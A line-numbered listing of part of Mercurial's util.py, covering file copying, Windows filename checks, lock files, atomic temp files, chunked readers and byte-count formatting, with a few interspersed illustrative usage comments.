1935 1941 progress.topic = _(b'linking') if hardlink else _(b'copying')
1936 1942
1937 1943 if os.path.isdir(src):
1938 1944 if hardlink is None:
1939 1945 hardlink = (
1940 1946 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1941 1947 )
1942 1948 settopic()
1943 1949 os.mkdir(dst)
1944 1950 for name, kind in listdir(src):
1945 1951 srcname = os.path.join(src, name)
1946 1952 dstname = os.path.join(dst, name)
1947 1953 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1948 1954 num += n
1949 1955 else:
1950 1956 if hardlink is None:
1951 1957 hardlink = (
1952 1958 os.stat(os.path.dirname(src)).st_dev
1953 1959 == os.stat(os.path.dirname(dst)).st_dev
1954 1960 )
1955 1961 settopic()
1956 1962
1957 1963 if hardlink:
1958 1964 try:
1959 1965 oslink(src, dst)
1960 1966 except (IOError, OSError):
1961 1967 hardlink = False
1962 1968 shutil.copy(src, dst)
1963 1969 else:
1964 1970 shutil.copy(src, dst)
1965 1971 num += 1
1966 1972 if progress:
1967 1973 progress.increment()
1968 1974
1969 1975 return hardlink, num
1970 1976
1971 1977
1972 1978 _winreservednames = {
1973 1979 b'con',
1974 1980 b'prn',
1975 1981 b'aux',
1976 1982 b'nul',
1977 1983 b'com1',
1978 1984 b'com2',
1979 1985 b'com3',
1980 1986 b'com4',
1981 1987 b'com5',
1982 1988 b'com6',
1983 1989 b'com7',
1984 1990 b'com8',
1985 1991 b'com9',
1986 1992 b'lpt1',
1987 1993 b'lpt2',
1988 1994 b'lpt3',
1989 1995 b'lpt4',
1990 1996 b'lpt5',
1991 1997 b'lpt6',
1992 1998 b'lpt7',
1993 1999 b'lpt8',
1994 2000 b'lpt9',
1995 2001 }
1996 2002 _winreservedchars = b':*?"<>|'
1997 2003
1998 2004
1999 2005 def checkwinfilename(path):
2000 2006 r'''Check that the base-relative path is a valid filename on Windows.
2001 2007 Returns None if the path is ok, or a UI string describing the problem.
2002 2008
2003 2009 >>> checkwinfilename(b"just/a/normal/path")
2004 2010 >>> checkwinfilename(b"foo/bar/con.xml")
2005 2011 "filename contains 'con', which is reserved on Windows"
2006 2012 >>> checkwinfilename(b"foo/con.xml/bar")
2007 2013 "filename contains 'con', which is reserved on Windows"
2008 2014 >>> checkwinfilename(b"foo/bar/xml.con")
2009 2015 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2010 2016 "filename contains 'AUX', which is reserved on Windows"
2011 2017 >>> checkwinfilename(b"foo/bar/bla:.txt")
2012 2018 "filename contains ':', which is reserved on Windows"
2013 2019 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2014 2020 "filename contains '\\x07', which is invalid on Windows"
2015 2021 >>> checkwinfilename(b"foo/bar/bla ")
2016 2022 "filename ends with ' ', which is not allowed on Windows"
2017 2023 >>> checkwinfilename(b"../bar")
2018 2024 >>> checkwinfilename(b"foo\\")
2019 2025 "filename ends with '\\', which is invalid on Windows"
2020 2026 >>> checkwinfilename(b"foo\\/bar")
2021 2027 "directory name ends with '\\', which is invalid on Windows"
2022 2028 '''
2023 2029 if path.endswith(b'\\'):
2024 2030 return _(b"filename ends with '\\', which is invalid on Windows")
2025 2031 if b'\\/' in path:
2026 2032 return _(b"directory name ends with '\\', which is invalid on Windows")
2027 2033 for n in path.replace(b'\\', b'/').split(b'/'):
2028 2034 if not n:
2029 2035 continue
2030 2036 for c in _filenamebytestr(n):
2031 2037 if c in _winreservedchars:
2032 2038 return (
2033 2039 _(
2034 2040 b"filename contains '%s', which is reserved "
2035 2041 b"on Windows"
2036 2042 )
2037 2043 % c
2038 2044 )
2039 2045 if ord(c) <= 31:
2040 2046 return _(
2041 2047 b"filename contains '%s', which is invalid on Windows"
2042 2048 ) % stringutil.escapestr(c)
2043 2049 base = n.split(b'.')[0]
2044 2050 if base and base.lower() in _winreservednames:
2045 2051 return (
2046 2052 _(b"filename contains '%s', which is reserved on Windows")
2047 2053 % base
2048 2054 )
2049 2055 t = n[-1:]
2050 2056 if t in b'. ' and n not in b'..':
2051 2057 return (
2052 2058 _(
2053 2059 b"filename ends with '%s', which is not allowed "
2054 2060 b"on Windows"
2055 2061 )
2056 2062 % t
2057 2063 )
2058 2064
2059 2065
2060 2066 timer = getattr(time, "perf_counter", None)
2061 2067
2062 2068 if pycompat.iswindows:
2063 2069 checkosfilename = checkwinfilename
2064 2070 if not timer:
2065 2071 timer = time.clock
2066 2072 else:
2067 2073 # mercurial.windows doesn't have platform.checkosfilename
2068 2074 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2069 2075 if not timer:
2070 2076 timer = time.time
2071 2077
2072 2078
2073 2079 def makelock(info, pathname):
2074 2080 """Create a lock file atomically if possible
2075 2081
2076 2082 This may leave a stale lock file if symlinks aren't supported and a
2077 2083 signal interrupt arrives while the file is being written.
2078 2084 """
2079 2085 try:
2080 2086 return os.symlink(info, pathname)
2081 2087 except OSError as why:
2082 2088 if why.errno == errno.EEXIST:
2083 2089 raise
2084 2090 except AttributeError: # no symlink in os
2085 2091 pass
2086 2092
2087 2093 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2088 2094 ld = os.open(pathname, flags)
2089 2095 os.write(ld, info)
2090 2096 os.close(ld)
2091 2097
2092 2098
2093 2099 def readlock(pathname):
2094 2100 try:
2095 2101 return readlink(pathname)
2096 2102 except OSError as why:
2097 2103 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2098 2104 raise
2099 2105 except AttributeError: # no symlink in os
2100 2106 pass
2101 2107 with posixfile(pathname, b'rb') as fp:
2102 2108 return fp.read()
2103 2109
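# Illustrative round trip (not part of util.py; the path and content are
# made up): where symlinks are available the lock data lives in the link
# target, otherwise a regular file is created with O_EXCL and read back.
#
# >>> makelock(b'host:1234', b'somelock')  # doctest: +SKIP
# >>> readlock(b'somelock')                # doctest: +SKIP
# 'host:1234'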
2104 2110
2105 2111 def fstat(fp):
2106 2112 '''stat file object that may not have fileno method.'''
2107 2113 try:
2108 2114 return os.fstat(fp.fileno())
2109 2115 except AttributeError:
2110 2116 return os.stat(fp.name)
2111 2117
2112 2118
2113 2119 # File system features
2114 2120
2115 2121
2116 2122 def fscasesensitive(path):
2117 2123 """
2118 2124 Return true if the given path is on a case-sensitive filesystem
2119 2125
2120 2126 Requires a path (like /foo/.hg) ending with a foldable final
2121 2127 directory component.
2122 2128 """
2123 2129 s1 = os.lstat(path)
2124 2130 d, b = os.path.split(path)
2125 2131 b2 = b.upper()
2126 2132 if b == b2:
2127 2133 b2 = b.lower()
2128 2134 if b == b2:
2129 2135 return True # no evidence against case sensitivity
2130 2136 p2 = os.path.join(d, b2)
2131 2137 try:
2132 2138 s2 = os.lstat(p2)
2133 2139 if s2 == s1:
2134 2140 return False
2135 2141 return True
2136 2142 except OSError:
2137 2143 return True
2138 2144
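# Illustrative probe (not part of util.py; the path is made up): the
# check lstat()s the path again with its final component case-swapped
# and reports case-insensitivity when both stat results match.
#
# >>> fscasesensitive(b'/tmp/somerepo/.hg')  # doctest: +SKIP
# True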
2139 2145
2140 2146 try:
2141 2147 import re2 # pytype: disable=import-error
2142 2148
2143 2149 _re2 = None
2144 2150 except ImportError:
2145 2151 _re2 = False
2146 2152
2147 2153
2148 2154 class _re(object):
2149 2155 def _checkre2(self):
2150 2156 global _re2
2151 2157 try:
2152 2158 # check if match works, see issue3964
2153 2159 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2154 2160 except ImportError:
2155 2161 _re2 = False
2156 2162
2157 2163 def compile(self, pat, flags=0):
2158 2164 '''Compile a regular expression, using re2 if possible
2159 2165
2160 2166 For best performance, use only re2-compatible regexp features. The
2161 2167 only flags from the re module that are re2-compatible are
2162 2168 IGNORECASE and MULTILINE.'''
2163 2169 if _re2 is None:
2164 2170 self._checkre2()
2165 2171 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2166 2172 if flags & remod.IGNORECASE:
2167 2173 pat = b'(?i)' + pat
2168 2174 if flags & remod.MULTILINE:
2169 2175 pat = b'(?m)' + pat
2170 2176 try:
2171 2177 return re2.compile(pat)
2172 2178 except re2.error:
2173 2179 pass
2174 2180 return remod.compile(pat, flags)
2175 2181
2176 2182 @propertycache
2177 2183 def escape(self):
2178 2184 '''Return the version of escape corresponding to self.compile.
2179 2185
2180 2186 This is imperfect because whether re2 or re is used for a particular
2181 2187 function depends on the flags, etc, but it's the best we can do.
2182 2188 '''
2183 2189 global _re2
2184 2190 if _re2 is None:
2185 2191 self._checkre2()
2186 2192 if _re2:
2187 2193 return re2.escape
2188 2194 else:
2189 2195 return remod.escape
2190 2196
2191 2197
2192 2198 re = _re()
2193 2199
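# Illustrative usage (not part of util.py): callers go through this
# module-level ``re`` instance, which transparently prefers re2 when it
# is importable and falls back to the stdlib otherwise.
#
# >>> pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
# >>> bool(pat.match(b'DEADBEEF' * 5))
# True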
2194 2200 _fspathcache = {}
2195 2201
2196 2202
2197 2203 def fspath(name, root):
2198 2204 '''Get name in the case stored in the filesystem
2199 2205
2200 2206 The name should be relative to root, and be normcase-ed for efficiency.
2201 2207
2202 2208 Note that this function is unnecessary, and should not be
2203 2209 called, for case-sensitive filesystems (simply because it's expensive).
2204 2210
2205 2211 The root should be normcase-ed, too.
2206 2212 '''
2207 2213
2208 2214 def _makefspathcacheentry(dir):
2209 2215 return dict((normcase(n), n) for n in os.listdir(dir))
2210 2216
2211 2217 seps = pycompat.ossep
2212 2218 if pycompat.osaltsep:
2213 2219 seps = seps + pycompat.osaltsep
2214 2220 # Protect backslashes. This gets silly very quickly.
2215 2221 seps = seps.replace(b'\\', b'\\\\')
2216 2222 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2217 2223 dir = os.path.normpath(root)
2218 2224 result = []
2219 2225 for part, sep in pattern.findall(name):
2220 2226 if sep:
2221 2227 result.append(sep)
2222 2228 continue
2223 2229
2224 2230 if dir not in _fspathcache:
2225 2231 _fspathcache[dir] = _makefspathcacheentry(dir)
2226 2232 contents = _fspathcache[dir]
2227 2233
2228 2234 found = contents.get(part)
2229 2235 if not found:
2230 2236 # retry "once per directory" per "dirstate.walk", which
2231 2237 # may take place for each patch of "hg qpush", for example
2232 2238 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2233 2239 found = contents.get(part)
2234 2240
2235 2241 result.append(found or part)
2236 2242 dir = os.path.join(dir, part)
2237 2243
2238 2244 return b''.join(result)
2239 2245
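# Illustrative example (not part of util.py; assumes a case-insensitive
# filesystem where the file was created as ``Foo/Bar.txt`` under /repo):
#
# >>> fspath(b'foo/bar.txt', b'/repo')  # doctest: +SKIP
# 'Foo/Bar.txt'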
2240 2246
2241 2247 def checknlink(testfile):
2242 2248 '''check whether hardlink count reporting works properly'''
2243 2249
2244 2250 # testfile may be open, so we need a separate file for checking to
2245 2251 # work around issue2543 (or testfile may get lost on Samba shares)
2246 2252 f1, f2, fp = None, None, None
2247 2253 try:
2248 2254 fd, f1 = pycompat.mkstemp(
2249 2255 prefix=b'.%s-' % os.path.basename(testfile),
2250 2256 suffix=b'1~',
2251 2257 dir=os.path.dirname(testfile),
2252 2258 )
2253 2259 os.close(fd)
2254 2260 f2 = b'%s2~' % f1[:-2]
2255 2261
2256 2262 oslink(f1, f2)
2257 2263 # nlinks() may behave differently for files on Windows shares if
2258 2264 # the file is open.
2259 2265 fp = posixfile(f2)
2260 2266 return nlinks(f2) > 1
2261 2267 except OSError:
2262 2268 return False
2263 2269 finally:
2264 2270 if fp is not None:
2265 2271 fp.close()
2266 2272 for f in (f1, f2):
2267 2273 try:
2268 2274 if f is not None:
2269 2275 os.unlink(f)
2270 2276 except OSError:
2271 2277 pass
2272 2278
2273 2279
2274 2280 def endswithsep(path):
2275 2281 '''Check path ends with os.sep or os.altsep.'''
2276 2282 return (
2277 2283 path.endswith(pycompat.ossep)
2278 2284 or pycompat.osaltsep
2279 2285 and path.endswith(pycompat.osaltsep)
2280 2286 )
2281 2287
2282 2288
2283 2289 def splitpath(path):
2284 2290 '''Split path by os.sep.
2285 2291 Note that this function does not use os.altsep because this is
2286 2292 an alternative to a simple "xxx.split(os.sep)".
2287 2293 It is recommended to use os.path.normpath() before using this
2288 2294 function if needed.'''
2289 2295 return path.split(pycompat.ossep)
2290 2296
2291 2297
2292 2298 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2293 2299 """Create a temporary file with the same contents from name
2294 2300
2295 2301 The permission bits are copied from the original file.
2296 2302
2297 2303 If the temporary file is going to be truncated immediately, you
2298 2304 can use emptyok=True as an optimization.
2299 2305
2300 2306 Returns the name of the temporary file.
2301 2307 """
2302 2308 d, fn = os.path.split(name)
2303 2309 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2304 2310 os.close(fd)
2305 2311 # Temporary files are created with mode 0600, which is usually not
2306 2312 # what we want. If the original file already exists, just copy
2307 2313 # its mode. Otherwise, manually obey umask.
2308 2314 copymode(name, temp, createmode, enforcewritable)
2309 2315
2310 2316 if emptyok:
2311 2317 return temp
2312 2318 try:
2313 2319 try:
2314 2320 ifp = posixfile(name, b"rb")
2315 2321 except IOError as inst:
2316 2322 if inst.errno == errno.ENOENT:
2317 2323 return temp
2318 2324 if not getattr(inst, 'filename', None):
2319 2325 inst.filename = name
2320 2326 raise
2321 2327 ofp = posixfile(temp, b"wb")
2322 2328 for chunk in filechunkiter(ifp):
2323 2329 ofp.write(chunk)
2324 2330 ifp.close()
2325 2331 ofp.close()
2326 2332 except: # re-raises
2327 2333 try:
2328 2334 os.unlink(temp)
2329 2335 except OSError:
2330 2336 pass
2331 2337 raise
2332 2338 return temp
2333 2339
2334 2340
2335 2341 class filestat(object):
2336 2342 """help to exactly detect change of a file
2337 2343
2338 2344 'stat' attribute is result of 'os.stat()' if specified 'path'
2339 2345 exists. Otherwise, it is None. This can avoid preparative
2340 2346 'exists()' examination on client side of this class.
2341 2347 """
2342 2348
2343 2349 def __init__(self, stat):
2344 2350 self.stat = stat
2345 2351
2346 2352 @classmethod
2347 2353 def frompath(cls, path):
2348 2354 try:
2349 2355 stat = os.stat(path)
2350 2356 except OSError as err:
2351 2357 if err.errno != errno.ENOENT:
2352 2358 raise
2353 2359 stat = None
2354 2360 return cls(stat)
2355 2361
2356 2362 @classmethod
2357 2363 def fromfp(cls, fp):
2358 2364 stat = os.fstat(fp.fileno())
2359 2365 return cls(stat)
2360 2366
2361 2367 __hash__ = object.__hash__
2362 2368
2363 2369 def __eq__(self, old):
2364 2370 try:
2365 2371 # if ambiguity between stat of new and old file is
2366 2372 # avoided, comparison of size, ctime and mtime is enough
2367 2373 # to exactly detect change of a file regardless of platform
2368 2374 return (
2369 2375 self.stat.st_size == old.stat.st_size
2370 2376 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2371 2377 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2372 2378 )
2373 2379 except AttributeError:
2374 2380 pass
2375 2381 try:
2376 2382 return self.stat is None and old.stat is None
2377 2383 except AttributeError:
2378 2384 return False
2379 2385
2380 2386 def isambig(self, old):
2381 2387 """Examine whether new (= self) stat is ambiguous against old one
2382 2388
2383 2389 "S[N]" below means stat of a file at N-th change:
2384 2390
2385 2391 - S[n-1].ctime < S[n].ctime: can detect change of a file
2386 2392 - S[n-1].ctime == S[n].ctime
2387 2393 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2388 2394 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2389 2395 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2390 2396 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2391 2397
2392 2398 Case (*2) above means that a file was changed twice or more within
2393 2399 the same second (= S[n-1].ctime), so comparing timestamps is
2394 2400 ambiguous.
2395 2401
2396 2402 The basic idea to avoid such ambiguity is "advance mtime by 1 sec
2397 2403 if the timestamp is ambiguous".
2398 2404
2399 2405 But advancing mtime only in case (*2) doesn't work as
2400 2406 expected, because naturally advanced S[n].mtime in case (*1)
2401 2407 might be equal to manually advanced S[n-1 or earlier].mtime.
2402 2408
2403 2409 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2404 2410 treated as ambiguous regardless of mtime, to avoid overlooking
2405 2411 changes hidden by collisions between such mtimes.
2406 2412
2407 2413 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2408 2414 S[n].mtime", even if size of a file isn't changed.
2409 2415 """
2410 2416 try:
2411 2417 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 2418 except AttributeError:
2413 2419 return False
2414 2420
2415 2421 def avoidambig(self, path, old):
2416 2422 """Change file stat of specified path to avoid ambiguity
2417 2423
2418 2424 'old' should be previous filestat of 'path'.
2419 2425
2420 2426 This skips avoiding ambiguity if the process doesn't have
2421 2427 appropriate privileges for 'path', and returns False in that
2422 2428 case.
2423 2429
2424 2430 Otherwise, this returns True, as "ambiguity is avoided".
2425 2431 """
2426 2432 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2427 2433 try:
2428 2434 os.utime(path, (advanced, advanced))
2429 2435 except OSError as inst:
2430 2436 if inst.errno == errno.EPERM:
2431 2437 # utime() on the file created by another user causes EPERM,
2432 2438 # if a process doesn't have appropriate privileges
2433 2439 return False
2434 2440 raise
2435 2441 return True
2436 2442
2437 2443 def __ne__(self, other):
2438 2444 return not self == other
2439 2445
2440 2446
2441 2447 class atomictempfile(object):
2442 2448 '''writable file object that atomically updates a file
2443 2449
2444 2450 All writes will go to a temporary copy of the original file. Call
2445 2451 close() when you are done writing, and atomictempfile will rename
2446 2452 the temporary copy to the original name, making the changes
2447 2453 visible. If the object is destroyed without being closed, all your
2448 2454 writes are discarded.
2449 2455
2450 2456 checkambig argument of constructor is used with filestat, and is
2451 2457 useful only if target file is guarded by any lock (e.g. repo.lock
2452 2458 or repo.wlock).
2453 2459 '''
2454 2460
2455 2461 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2456 2462 self.__name = name # permanent name
2457 2463 self._tempname = mktempcopy(
2458 2464 name,
2459 2465 emptyok=(b'w' in mode),
2460 2466 createmode=createmode,
2461 2467 enforcewritable=(b'w' in mode),
2462 2468 )
2463 2469
2464 2470 self._fp = posixfile(self._tempname, mode)
2465 2471 self._checkambig = checkambig
2466 2472
2467 2473 # delegated methods
2468 2474 self.read = self._fp.read
2469 2475 self.write = self._fp.write
2470 2476 self.seek = self._fp.seek
2471 2477 self.tell = self._fp.tell
2472 2478 self.fileno = self._fp.fileno
2473 2479
2474 2480 def close(self):
2475 2481 if not self._fp.closed:
2476 2482 self._fp.close()
2477 2483 filename = localpath(self.__name)
2478 2484 oldstat = self._checkambig and filestat.frompath(filename)
2479 2485 if oldstat and oldstat.stat:
2480 2486 rename(self._tempname, filename)
2481 2487 newstat = filestat.frompath(filename)
2482 2488 if newstat.isambig(oldstat):
2483 2489 # stat of changed file is ambiguous to original one
2484 2490 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2485 2491 os.utime(filename, (advanced, advanced))
2486 2492 else:
2487 2493 rename(self._tempname, filename)
2488 2494
2489 2495 def discard(self):
2490 2496 if not self._fp.closed:
2491 2497 try:
2492 2498 os.unlink(self._tempname)
2493 2499 except OSError:
2494 2500 pass
2495 2501 self._fp.close()
2496 2502
2497 2503 def __del__(self):
2498 2504 if safehasattr(self, '_fp'): # constructor actually did something
2499 2505 self.discard()
2500 2506
2501 2507 def __enter__(self):
2502 2508 return self
2503 2509
2504 2510 def __exit__(self, exctype, excvalue, traceback):
2505 2511 if exctype is not None:
2506 2512 self.discard()
2507 2513 else:
2508 2514 self.close()
2509 2515
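# Illustrative usage (not part of util.py; the file name is made up):
# readers never observe a half-written file, because content is staged
# in a temporary copy that is rename()d into place on a clean close.
#
# >>> with atomictempfile(b'data.bin') as fp:  # doctest: +SKIP
# ...     fp.write(b'all or nothing')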
2510 2516
2511 2517 def unlinkpath(f, ignoremissing=False, rmdir=True):
2512 2518 """unlink and remove the directory if it is empty"""
2513 2519 if ignoremissing:
2514 2520 tryunlink(f)
2515 2521 else:
2516 2522 unlink(f)
2517 2523 if rmdir:
2518 2524 # try removing directories that might now be empty
2519 2525 try:
2520 2526 removedirs(os.path.dirname(f))
2521 2527 except OSError:
2522 2528 pass
2523 2529
2524 2530
2525 2531 def tryunlink(f):
2526 2532 """Attempt to remove a file, ignoring ENOENT errors."""
2527 2533 try:
2528 2534 unlink(f)
2529 2535 except OSError as e:
2530 2536 if e.errno != errno.ENOENT:
2531 2537 raise
2532 2538
2533 2539
2534 2540 def makedirs(name, mode=None, notindexed=False):
2535 2541 """recursive directory creation with parent mode inheritance
2536 2542
2537 2543 Newly created directories are marked as "not to be indexed by
2538 2544 the content indexing service", if ``notindexed`` is specified
2539 2545 for "write" mode access.
2540 2546 """
2541 2547 try:
2542 2548 makedir(name, notindexed)
2543 2549 except OSError as err:
2544 2550 if err.errno == errno.EEXIST:
2545 2551 return
2546 2552 if err.errno != errno.ENOENT or not name:
2547 2553 raise
2548 2554 parent = os.path.dirname(os.path.abspath(name))
2549 2555 if parent == name:
2550 2556 raise
2551 2557 makedirs(parent, mode, notindexed)
2552 2558 try:
2553 2559 makedir(name, notindexed)
2554 2560 except OSError as err:
2555 2561 # Catch EEXIST to handle races
2556 2562 if err.errno == errno.EEXIST:
2557 2563 return
2558 2564 raise
2559 2565 if mode is not None:
2560 2566 os.chmod(name, mode)
2561 2567
2562 2568
2563 2569 def readfile(path):
2564 2570 with open(path, b'rb') as fp:
2565 2571 return fp.read()
2566 2572
2567 2573
2568 2574 def writefile(path, text):
2569 2575 with open(path, b'wb') as fp:
2570 2576 fp.write(text)
2571 2577
2572 2578
2573 2579 def appendfile(path, text):
2574 2580 with open(path, b'ab') as fp:
2575 2581 fp.write(text)
2576 2582
2577 2583
2578 2584 class chunkbuffer(object):
2579 2585 """Allow arbitrary sized chunks of data to be efficiently read from an
2580 2586 iterator over chunks of arbitrary size."""
2581 2587
2582 2588 def __init__(self, in_iter):
2583 2589 """in_iter is the iterator that's iterating over the input chunks."""
2584 2590
2585 2591 def splitbig(chunks):
2586 2592 for chunk in chunks:
2587 2593 if len(chunk) > 2 ** 20:
2588 2594 pos = 0
2589 2595 while pos < len(chunk):
2590 2596 end = pos + 2 ** 18
2591 2597 yield chunk[pos:end]
2592 2598 pos = end
2593 2599 else:
2594 2600 yield chunk
2595 2601
2596 2602 self.iter = splitbig(in_iter)
2597 2603 self._queue = collections.deque()
2598 2604 self._chunkoffset = 0
2599 2605
2600 2606 def read(self, l=None):
2601 2607 """Read L bytes of data from the iterator of chunks of data.
2602 2608 Returns less than L bytes if the iterator runs dry.
2603 2609
2604 2610 If size parameter is omitted, read everything"""
2605 2611 if l is None:
2606 2612 return b''.join(self.iter)
2607 2613
2608 2614 left = l
2609 2615 buf = []
2610 2616 queue = self._queue
2611 2617 while left > 0:
2612 2618 # refill the queue
2613 2619 if not queue:
2614 2620 target = 2 ** 18
2615 2621 for chunk in self.iter:
2616 2622 queue.append(chunk)
2617 2623 target -= len(chunk)
2618 2624 if target <= 0:
2619 2625 break
2620 2626 if not queue:
2621 2627 break
2622 2628
2623 2629 # The easy way to do this would be to queue.popleft(), modify the
2624 2630 # chunk (if necessary), then queue.appendleft(). However, for cases
2625 2631 # where we read partial chunk content, this incurs 2 dequeue
2626 2632 # mutations and creates a new str for the remaining chunk in the
2627 2633 # queue. Our code below avoids this overhead.
2628 2634
2629 2635 chunk = queue[0]
2630 2636 chunkl = len(chunk)
2631 2637 offset = self._chunkoffset
2632 2638
2633 2639 # Use full chunk.
2634 2640 if offset == 0 and left >= chunkl:
2635 2641 left -= chunkl
2636 2642 queue.popleft()
2637 2643 buf.append(chunk)
2638 2644 # self._chunkoffset remains at 0.
2639 2645 continue
2640 2646
2641 2647 chunkremaining = chunkl - offset
2642 2648
2643 2649 # Use all of unconsumed part of chunk.
2644 2650 if left >= chunkremaining:
2645 2651 left -= chunkremaining
2646 2652 queue.popleft()
2647 2653 # offset == 0 is enabled by block above, so this won't merely
2648 2654 # copy via ``chunk[0:]``.
2649 2655 buf.append(chunk[offset:])
2650 2656 self._chunkoffset = 0
2651 2657
2652 2658 # Partial chunk needed.
2653 2659 else:
2654 2660 buf.append(chunk[offset : offset + left])
2655 2661 self._chunkoffset += left
2656 2662 left -= chunkremaining
2657 2663
2658 2664 return b''.join(buf)
2659 2665
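# Illustrative example (not part of util.py): fixed-size reads are
# satisfied no matter how the underlying iterator splits its data.
#
# >>> cb = chunkbuffer(iter([b'abc', b'defg', b'h']))
# >>> cb.read(4)
# 'abcd'
# >>> cb.read(4)
# 'efgh'
# >>> cb.read(4)
# ''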
2660 2666
2661 2667 def filechunkiter(f, size=131072, limit=None):
2662 2668 """Create a generator that produces the data in the file size
2663 2669 (default 131072) bytes at a time, up to optional limit (default is
2664 2670 to read all data). Chunks may be less than size bytes if the
2665 2671 chunk is the last chunk in the file, or the file is a socket or
2666 2672 some other type of file that sometimes reads less data than is
2667 2673 requested."""
2668 2674 assert size >= 0
2669 2675 assert limit is None or limit >= 0
2670 2676 while True:
2671 2677 if limit is None:
2672 2678 nbytes = size
2673 2679 else:
2674 2680 nbytes = min(limit, size)
2675 2681 s = nbytes and f.read(nbytes)
2676 2682 if not s:
2677 2683 break
2678 2684 if limit:
2679 2685 limit -= len(s)
2680 2686 yield s
2681 2687
2682 2688
2683 2689 class cappedreader(object):
2684 2690 """A file object proxy that allows reading up to N bytes.
2685 2691
2686 2692 Given a source file object, instances of this type allow reading up to
2687 2693 N bytes from that source file object. Attempts to read past the allowed
2688 2694 limit are treated as EOF.
2689 2695
2690 2696 It is assumed that I/O is not performed on the original file object
2691 2697 in addition to I/O that is performed by this instance. If there is,
2692 2698 state tracking will get out of sync and unexpected results will ensue.
2693 2699 """
2694 2700
2695 2701 def __init__(self, fh, limit):
2696 2702 """Allow reading up to <limit> bytes from <fh>."""
2697 2703 self._fh = fh
2698 2704 self._left = limit
2699 2705
2700 2706 def read(self, n=-1):
2701 2707 if not self._left:
2702 2708 return b''
2703 2709
2704 2710 if n < 0:
2705 2711 n = self._left
2706 2712
2707 2713 data = self._fh.read(min(n, self._left))
2708 2714 self._left -= len(data)
2709 2715 assert self._left >= 0
2710 2716
2711 2717 return data
2712 2718
2713 2719 def readinto(self, b):
2714 2720 res = self.read(len(b))
2715 2721 if res is None:
2716 2722 return None
2717 2723
2718 2724 b[0 : len(res)] = res
2719 2725 return len(res)
2720 2726
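# Illustrative example (not part of util.py): reads beyond the cap are
# treated as EOF even though the underlying file object has more data.
#
# >>> limited = cappedreader(stringio(b'0123456789'), 4)
# >>> limited.read(100)
# '0123'
# >>> limited.read(1)
# ''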
2721 2727
2722 2728 def unitcountfn(*unittable):
2723 2729 '''return a function that renders a readable count of some quantity'''
2724 2730
2725 2731 def go(count):
2726 2732 for multiplier, divisor, format in unittable:
2727 2733 if abs(count) >= divisor * multiplier:
2728 2734 return format % (count / float(divisor))
2729 2735 return unittable[-1][2] % count
2730 2736
2731 2737 return go
2732 2738
2733 2739
2734 2740 def processlinerange(fromline, toline):
2735 2741 """Check that linerange <fromline>:<toline> makes sense and return a
2736 2742 0-based range.
2737 2743
2738 2744 >>> processlinerange(10, 20)
2739 2745 (9, 20)
2740 2746 >>> processlinerange(2, 1)
2741 2747 Traceback (most recent call last):
2742 2748 ...
2743 2749 ParseError: line range must be positive
2744 2750 >>> processlinerange(0, 5)
2745 2751 Traceback (most recent call last):
2746 2752 ...
2747 2753 ParseError: fromline must be strictly positive
2748 2754 """
2749 2755 if toline - fromline < 0:
2750 2756 raise error.ParseError(_(b"line range must be positive"))
2751 2757 if fromline < 1:
2752 2758 raise error.ParseError(_(b"fromline must be strictly positive"))
2753 2759 return fromline - 1, toline
2754 2760
2755 2761
2756 2762 bytecount = unitcountfn(
2757 2763 (100, 1 << 30, _(b'%.0f GB')),
2758 2764 (10, 1 << 30, _(b'%.1f GB')),
2759 2765 (1, 1 << 30, _(b'%.2f GB')),
2760 2766 (100, 1 << 20, _(b'%.0f MB')),
2761 2767 (10, 1 << 20, _(b'%.1f MB')),
2762 2768 (1, 1 << 20, _(b'%.2f MB')),
2763 2769 (100, 1 << 10, _(b'%.0f KB')),
2764 2770 (10, 1 << 10, _(b'%.1f KB')),
2765 2771 (1, 1 << 10, _(b'%.2f KB')),
2766 2772 (1, 1, _(b'%.0f bytes')),
2767 2773 )
2768 2774
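# Illustrative renderings (not part of util.py): the first matching
# (multiplier, divisor) row picks the unit and precision, so larger
# values within a unit are shown with fewer decimals.
#
# >>> bytecount(123)
# '123 bytes'
# >>> bytecount(456789)
# '446 KB'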
2769 2775
2770 2776 class transformingwriter(object):
2771 2777 """Writable file wrapper to transform data by function"""
2772 2778
2773 2779 def __init__(self, fp, encode):
2774 2780 self._fp = fp
2775 2781 self._encode = encode
2776 2782
2777 2783 def close(self):
2778 2784 self._fp.close()
2779 2785
2780 2786 def flush(self):
2781 2787 self._fp.flush()
2782 2788
2783 2789 def write(self, data):
2784 2790 return self._fp.write(self._encode(data))
2785 2791
2786 2792
2787 2793 # Matches a single EOL which can either be a CRLF where repeated CR
2788 2794 # are removed or a LF. We do not care about old Macintosh files, so a
2789 2795 # stray CR is an error.
2790 2796 _eolre = remod.compile(br'\r*\n')
2791 2797
2792 2798
2793 2799 def tolf(s):
2794 2800 return _eolre.sub(b'\n', s)
2795 2801
2796 2802
2797 2803 def tocrlf(s):
2798 2804 return _eolre.sub(b'\r\n', s)
2799 2805
2800 2806
